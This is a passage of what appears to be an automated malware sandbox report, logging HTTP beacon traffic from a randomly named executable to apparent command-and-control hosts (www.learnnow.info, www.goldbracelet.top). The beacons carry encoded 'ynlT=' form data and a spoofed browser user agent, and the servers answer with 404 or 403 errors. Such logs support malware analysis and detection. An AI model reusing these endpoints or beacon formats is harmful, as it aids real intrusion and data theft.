                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.learnnow.info
                                                                                Referer: http://www.learnnow.info/6npp/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 75 6e 4f 64 74 36 68 67 36 62 34 36 4e 6b 35 38 4e 64 46 47 47 66 69 54 42 30 4f 44 62 63 6d 79 54 42 50 39 57 79 53 39 2f 6e 64 39 49 31 55 37 4c 30 58 7a 6b 66 7a 44 6e 76 75 50 77 4b 35 57 54 5a 2b 45 4b 72 73 77 6b 37 4c 70 4d 4c 69 66 4a 32 4c 33 69 57 36 46 30 6e 33 65 6f 2b 66 70 57 31 50 37 51 7a 2b 68 57 53 48 63 32 64 6e 34 68 4f 4d 64 36 6f 59 4d 48 47 63 77 6d 4e 2f 78 52 6f 52 39 49 6f 62 70 31 41 6b 63 58 47 75 77 6d 53 4f 4e 62 44 4a 74 79 53 73 62 6a 64 75 7a 78 33 73 42 58 79 62 43 51 4f 43 51 58 54 75 39 4d 35 33 50 64 6f 77 52 66 72 52 75 6d 66 72 79 62 6e 6f 54 54 32 68 39 51 4e 73 35 70 4a 78 56 79 78 39 38 74 4a 37 62 6c 6f 4d 52 32 5a 69 51 33 35 4e 57 43 2f 72 4b 43 41 41 51 77 77 78 48 30 4e 79 7a 68 32 71 78 72 4d 68 54 42 57 50 7a 4f 38 48 6d 7a 63 72 6b 53 4b 56 66 32 33 74 71 36 4b 6b 70 51 7a 66 6c 6e 59 4c 53 59 71 76 58 52 35 77 76 6f 4d 63 35 53 34 72 42 31 6c 79 53 59 56 42 4f 2b 67 6d 39 48 38 62 55 58 78 39 59 68 45 35 48 7a 6a 33 6a 6c 67 77 6c 74 [TRUNCATED]
                                                                                Data Ascii: ynlT=unOdt6hg6b46Nk58NdFGGfiTB0ODbcmyTBP9WyS9/nd9I1U7L0XzkfzDnvuPwK5WTZ+EKrswk7LpMLifJ2L3iW6F0n3eo+fpW1P7Qz+hWSHc2dn4hOMd6oYMHGcwmN/xRoR9Iobp1AkcXGuwmSONbDJtySsbjduzx3sBXybCQOCQXTu9M53PdowRfrRumfrybnoTT2h9QNs5pJxVyx98tJ7bloMR2ZiQ35NWC/rKCAAQwwxH0Nyzh2qxrMhTBWPzO8HmzcrkSKVf23tq6KkpQzflnYLSYqvXR5wvoMc5S4rB1lySYVBO+gm9H8bUXx9YhE5Hzj3jlgwltLa5gTIzkXKEZ1l0DVa2hKFZazTWLfDoLe5QFdrMMfdqehJLkRZXuhJ6c7GaTL4OC7VJKmvC04quNkVwQwT4V0fWOLYA7AlD0ZzstmXYwKIgbiM5e4GxW9jhS2wzMqBdl1qpCmOna24gseTV/uAXqLc6QpJzv5MAKgydw/aKvguFMvw8OE9FT+rqLIvUZW2SdNkACqe/Bo5K12ESrbYrkXuANDm4puxCmx2P5r4aBYbgQBfDpzNxORCTNS0cUHykTXN/HE4UVv7e/BcrJXxR/+ucaQAbMn0HwK1SQKgGHTn8cmA0BDWtwOnjETlDRG1UWVDuQ807xXPXHTm09DfCkVaR7QiZSW7n65Xfv/2mKgjwra4UApcA/1mm0fSB9AEXYKDeoMN3U0XNGfkwMAaLqmsC5sf5rW6DfR/WgRU0iWevgdHY8OGNiUa21sggopEfkdGJGaf9e609FL5aqj2ldJ8ZWDvVKgEjdU6pjaYcwemJi5sBL71tr1LxGdy6Zeaz9TMGPndXtFLFgnpmPKnDTjsrIQBW/oQwnDS6R/s04sJiqT1M4ZTsKwksZalfhaC17bU8XQWuRKMsG6jE3hs4+RrKQW2Thg3fjramJ8p//kbay/eqo/88gAF6fPIi4HSXg8rpO2WzGxo8wCPY9hdGY0qQdNb8djwDSKw [TRUNCATED]
                                                                                Nov 26, 2024 09:29:38.677603960 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:29:38 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.849741199.192.23.123806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:39.949367046 CET453OUTGET /6npp/?ynlT=jlm9uKJBzKMSKltuZ8hnGP24BGKDKPXveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiXWiw3/my+fKayPUfiCFUifSzt7jgsgTxNAwRGE5teyGFg==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.learnnow.info
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:29:41.219185114 CET548INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 26 Nov 2024 08:29:41 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.2.849742104.21.36.239806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:47.037352085 CET719OUTPOST /eln6/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.goldbracelet.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.goldbracelet.top
                                                                                Referer: http://www.goldbracelet.top/eln6/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 51 54 52 34 30 74 4f 53 5a 30 6b 50 73 55 45 56 4e 31 43 30 42 78 33 4f 47 63 66 54 45 31 6f 46 77 32 45 56 78 34 34 30 46 5a 74 56 50 6c 63 76 4e 31 67 36 45 38 76 45 62 54 65 62 44 67 76 33 69 42 5a 47 76 54 76 48 76 4f 6f 43 73 42 58 47 47 2f 66 56 63 39 41 4f 6f 53 72 4a 62 58 56 78 68 31 70 37 56 71 6a 31 41 76 65 49 34 64 4e 61 45 72 31 58 47 6e 77 53 63 65 34 65 33 59 57 4c 72 66 34 41 6d 53 72 63 68 67 36 4e 57 70 59 72 73 50 58 68 47 54 79 32 70 44 48 4f 68 34 52 33 4a 31 37 44 51 72 51 6a 42 38 6f 2b 6b 56 35 41 41 70 52 45 37 57 4d 6b 66 4c 30 45 66 38 49 70 69 63 41 72 56 62 30 3d
                                                                                Data Ascii: ynlT=QTR40tOSZ0kPsUEVN1C0Bx3OGcfTE1oFw2EVx440FZtVPlcvN1g6E8vEbTebDgv3iBZGvTvHvOoCsBXGG/fVc9AOoSrJbXVxh1p7Vqj1AveI4dNaEr1XGnwSce4e3YWLrf4AmSrchg6NWpYrsPXhGTy2pDHOh4R3J17DQrQjB8o+kV5AApRE7WMkfL0Ef8IpicArVb0=
                                                                                Nov 26, 2024 09:29:48.196850061 CET960INHTTP/1.1 403 Forbidden
                                                                                Date: Tue, 26 Nov 2024 08:29:48 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q317PC9xk8DkBeujY9mlBokcwRJQbPsT%2BlPW35RGYBfG3T9Gm9kltMhSdVNgx2lqM9%2BX3Wcd7dCVQfGak2zC%2FQHtJ17rBjKRCfkyH91%2B1aXmiO5hISP%2FtASdxMsoEu%2FlClF4T2zoWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e888346fb1a42b0-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1537&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=719&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.2.849743104.21.36.239806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:49.708719015 CET739OUTPOST /eln6/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.goldbracelet.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.goldbracelet.top
                                                                                Referer: http://www.goldbracelet.top/eln6/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 51 54 52 34 30 74 4f 53 5a 30 6b 50 76 31 30 56 41 32 61 30 48 52 33 4e 4a 38 66 54 50 56 6f 5a 77 32 49 56 78 35 4d 6b 46 76 39 56 50 41 34 76 4f 30 67 36 55 73 76 45 51 7a 65 53 48 67 76 73 69 42 55 78 76 52 37 48 76 4b 41 43 73 42 6e 47 48 4d 48 55 65 74 41 41 6b 79 72 4c 47 6e 56 78 68 31 70 37 56 71 32 6f 41 76 47 49 37 75 6c 61 46 50 68 55 64 48 77 52 62 65 34 65 68 6f 57 50 72 66 34 69 6d 54 48 32 68 6c 2b 4e 57 72 77 72 76 64 76 69 50 54 79 4b 30 7a 47 6d 67 64 4d 51 49 30 37 35 62 36 6f 42 66 4b 64 46 6c 6a 49 71 61 4c 5a 43 34 57 6b 50 66 49 63 79 61 4c 56 42 34 2f 51 62 4c 4d 6a 72 42 74 45 64 44 51 36 53 53 79 75 54 4b 6e 64 56 76 33 31 6c
                                                                                Data Ascii: ynlT=QTR40tOSZ0kPv10VA2a0HR3NJ8fTPVoZw2IVx5MkFv9VPA4vO0g6UsvEQzeSHgvsiBUxvR7HvKACsBnGHMHUetAAkyrLGnVxh1p7Vq2oAvGI7ulaFPhUdHwRbe4ehoWPrf4imTH2hl+NWrwrvdviPTyK0zGmgdMQI075b6oBfKdFljIqaLZC4WkPfIcyaLVB4/QbLMjrBtEdDQ6SSyuTKndVv31l
                                                                                Nov 26, 2024 09:29:50.901792049 CET960INHTTP/1.1 403 Forbidden
                                                                                Date: Tue, 26 Nov 2024 08:29:50 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzSX5KwzPEehZwDaykoMuLeNcZsKzStc9zadiFs5COioq0Rs9RatAy%2FlHHqce8rviVhARPv%2F1hZh19XhBlvrzBxOKSOZjOs%2FE2L2t1vQUwpEPclPLPPFQL%2BVBjVJyI20qs%2BT%2B9TMFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e888357e93e4379-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2132&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.2.849744104.21.36.239806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:52.599502087 CET1756OUTPOST /eln6/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.goldbracelet.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.goldbracelet.top
                                                                                Referer: http://www.goldbracelet.top/eln6/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 51 54 52 34 30 74 4f 53 5a 30 6b 50 76 31 30 56 41 32 61 30 48 52 33 4e 4a 38 66 54 50 56 6f 5a 77 32 49 56 78 35 4d 6b 46 76 31 56 50 53 77 76 49 6e 49 36 58 73 76 45 4f 44 65 66 48 67 75 75 69 42 4d 39 76 52 33 35 76 49 34 43 76 67 48 47 50 64 48 55 45 39 41 41 73 53 72 57 62 58 55 72 68 31 5a 2f 56 71 6d 6f 41 76 47 49 37 72 68 61 43 62 31 55 61 33 77 53 63 65 34 43 33 59 58 53 72 62 64 64 6d 54 44 4d 68 78 4b 4e 57 4c 41 72 74 6f 37 69 58 44 79 4d 31 7a 47 2b 67 64 49 50 49 30 6e 50 62 36 4d 37 66 4e 78 46 6f 6e 4a 31 66 76 73 5a 75 41 6b 65 65 61 38 49 55 34 30 6e 35 4f 38 68 42 66 33 65 41 34 38 6d 4e 77 79 64 48 51 48 6d 63 57 6c 44 76 51 73 36 43 6c 4f 72 6a 70 68 6f 34 49 62 36 54 55 33 65 6c 64 2f 33 77 4e 71 30 6b 37 47 4f 53 4c 54 79 54 4d 6f 53 64 2b 5a 45 64 36 61 73 61 77 76 53 51 35 70 52 6f 63 6e 2f 45 44 53 78 66 67 76 50 43 53 38 50 67 71 56 62 6e 43 47 43 67 2f 4e 32 48 2b 78 6d 35 75 4c 70 56 48 47 6f 34 34 47 30 31 4d 4c 34 6a 44 4d 61 59 39 49 6c 69 4d 78 66 2b [TRUNCATED]
                                                                                Data Ascii: ynlT=QTR40tOSZ0kPv10VA2a0HR3NJ8fTPVoZw2IVx5MkFv1VPSwvInI6XsvEODefHguuiBM9vR35vI4CvgHGPdHUE9AAsSrWbXUrh1Z/VqmoAvGI7rhaCb1Ua3wSce4C3YXSrbddmTDMhxKNWLArto7iXDyM1zG+gdIPI0nPb6M7fNxFonJ1fvsZuAkeea8IU40n5O8hBf3eA48mNwydHQHmcWlDvQs6ClOrjpho4Ib6TU3eld/3wNq0k7GOSLTyTMoSd+ZEd6asawvSQ5pRocn/EDSxfgvPCS8PgqVbnCGCg/N2H+xm5uLpVHGo44G01ML4jDMaY9IliMxf+sGNC3VqmYYfiJp0C7Fv02KUPiUz+lr0JBR913MhiyetDR9FBix0AiNqCXe0ll/Nod47hnzW/Qu6aYe18I3/RFRjcW/1kJGmy3YbpT9VVopjnE2IoDKsYkgMPZTPfBv1FHmSpkK+HJAbz+XKIoAPiuQf6usWNWa+7LRcDLK9uqSBBHEXdR14ETdD9Ee3/CINWu9F6/8HX3ZLd8k+yMpjZQfW5uMY4Y+fGmNZOJseAMz6ToGHOgMqzJRTWYhzasy3kFRssk4F6usZwTYRkVtEXb+7AVaxWnzXMNRVM8dbS4FYGTtkOcciakhtcMSVqPalKBKEhfBlsGP8wCYPbYYSlUOkXppxXyVQcFAhloUMES6U8SIxFDiJztyKMJjywtUl5mIF2p9q6wyKHBUpCJja9IQjlRjqtcht6Tu/IXB55WDplt8kTuMndSQtXexav58rU8xdMVjy/8mVmqo9226hyZy7xx9RS29Opwm0Zama1b7ARoVEheoM7MHeivpMMnoEzXGJ7xchwAm+SkQEdLMDNBjzLcRyFijVSVYiWpf59vXYpwv+KaCJRIUpIPUl/H+CczpFkk1SVt2kPpo/5Artthl5SG+b/BbwS1ds83Kdc3Ipv5GCbjMBcDe+7Iu57EVUt+g/ZN/5o0V+bzkZqrmdhnyp+jb3G99I3g6 [TRUNCATED]
                                                                                Nov 26, 2024 09:29:53.572052956 CET794INHTTP/1.1 403 Forbidden
                                                                                Date: Tue, 26 Nov 2024 08:29:53 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKhB57a8n8D5b70YlKyg78E8H4%2BFPK39SaU39fr9i1K64zzhxuNrpJJERYiTaT22AsfseSK9pzjAstZZck19q3gGpAP5UiOrUr71qYucymWzil0lh1v2CRZz277W2V3XL6C0yvqiSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8883689fbc42ab-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1647&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1756&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                Data Ascii: f
                                                                                Nov 26, 2024 09:29:53.572252989 CET167INData Raw: 39 63 0d 0a ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb
                                                                                Data Ascii: 9cM0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                32192.168.2.849745104.21.36.239806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:55.430844069 CET456OUTGET /eln6/?ynlT=dR5Y3aKNW3l55kULB1rxeiPlAcv1NFYB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd9wAhADTehU2x1Z0W7eNB4qt+OY8C4hNNFAeSI1HhK3X2w==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.goldbracelet.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:29:56.496787071 CET1236INHTTP/1.1 403 Forbidden
                                                                                Date: Tue, 26 Nov 2024 08:29:56 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPIZitb%2F5CIawpRDyT03ewKyYU1QYVC6KkknVeQ2eQ%2BviijUHj6bW827MwRmk3xnaYBo2KPONeQ8x3N0xYkI0Qn0NW4qSdtMXCrD7aqUgT9Ynn1RgE778l0Oax2IR3rkCdi70KnlbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e88837ada2872b6-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=456&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
